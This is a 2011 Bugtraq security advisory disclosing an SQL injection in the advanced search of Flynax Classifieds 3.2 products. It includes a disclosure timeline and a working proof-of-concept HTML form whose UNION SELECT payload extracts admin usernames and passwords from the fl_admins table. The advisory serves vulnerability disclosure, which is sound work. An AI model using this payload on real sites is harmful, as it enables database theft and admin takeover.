[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Vulnerability found in Flynax Classifieds products

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Vulnerability found in Flynax Classifieds products
From: Nasel Pentest <pentest@xxxxxxxxxxxx>
Date: Mon, 26 Sep 2011 11:03:13 -0300

I. BACKGROUND
--------------

Flynax is a software development company which produces several CMSs to mantain
different kinds of classifieds websites.

II. DESCRIPTION
----------------

Nasel members discovered a critical vulnerability in the front-end of
these products.

The vulnerability is an SQL injection in the advanced search,
specifically in the "f[city]" parameter located at following files:
 - General Classifieds Software: dealers.html,
 - Real Estate Classifieds: agents-realtors.html.
 - Auto Classifieds Script: dealers.html
 - Pets Classifieds Software: dealers.html

Exploiting this vulnerability can lead to a full disclosure of the database.


III. AFFECTED PRODUCTS
-----------------------

 - General Classifieds Software 3.2
 - Auto Classifieds Script 3.2
 - Real Estate Classifieds 3.2
 - Pets Classifieds Software 3.2

IV. PoC
------------

<form action="http://site/path/dealers.html"; method="post">
    Injection:<input value="') and 1=0 union all select
1,2,3,4,concat_ws(0x3a, User,
Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from
fl_admins#" name="f[city]" type="text">
    <input type="hidden" name="search" value="true">
    <input type="hidden" value="" name="f[country]">
    <input type="submit" value="Send">
</form>

The name of the admin users table can differ depending on the product's version.

V. CREDITS
-----------

This vulnerability was found by the Nasel Penetration Testing team formed by:
 - Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)
 - Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)
 - Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)
 - Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)

VI. ADVISORY INFORMATION
-------------------------

2011-09-15
==========

Vulnerability Found. Vendor notification. Scheduled advisory release
on September 25th, 2011.

2011-09-17
==========

Vendor replied that the problem was fixed.

2011-09-25
==========

Advisory released.

-- 
Nasel Penetration Testing Team
http://www.nasel.com.ar

Prev by Date: [SECURITY] CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST authentication
Next by Date: Re: PunBB 1.3.6 bug
Previous by thread: [SECURITY] CVE-2011-1184 Apache Tomcat - Multiple weaknesses in HTTP DIGEST authentication
Next by thread: [security bulletin] HPSBUX02702 SSRT100606 rev.4 - HP-UX Apache Web Server, Remote Denial of Service (DoS)
Index(es):
- Date
- Thread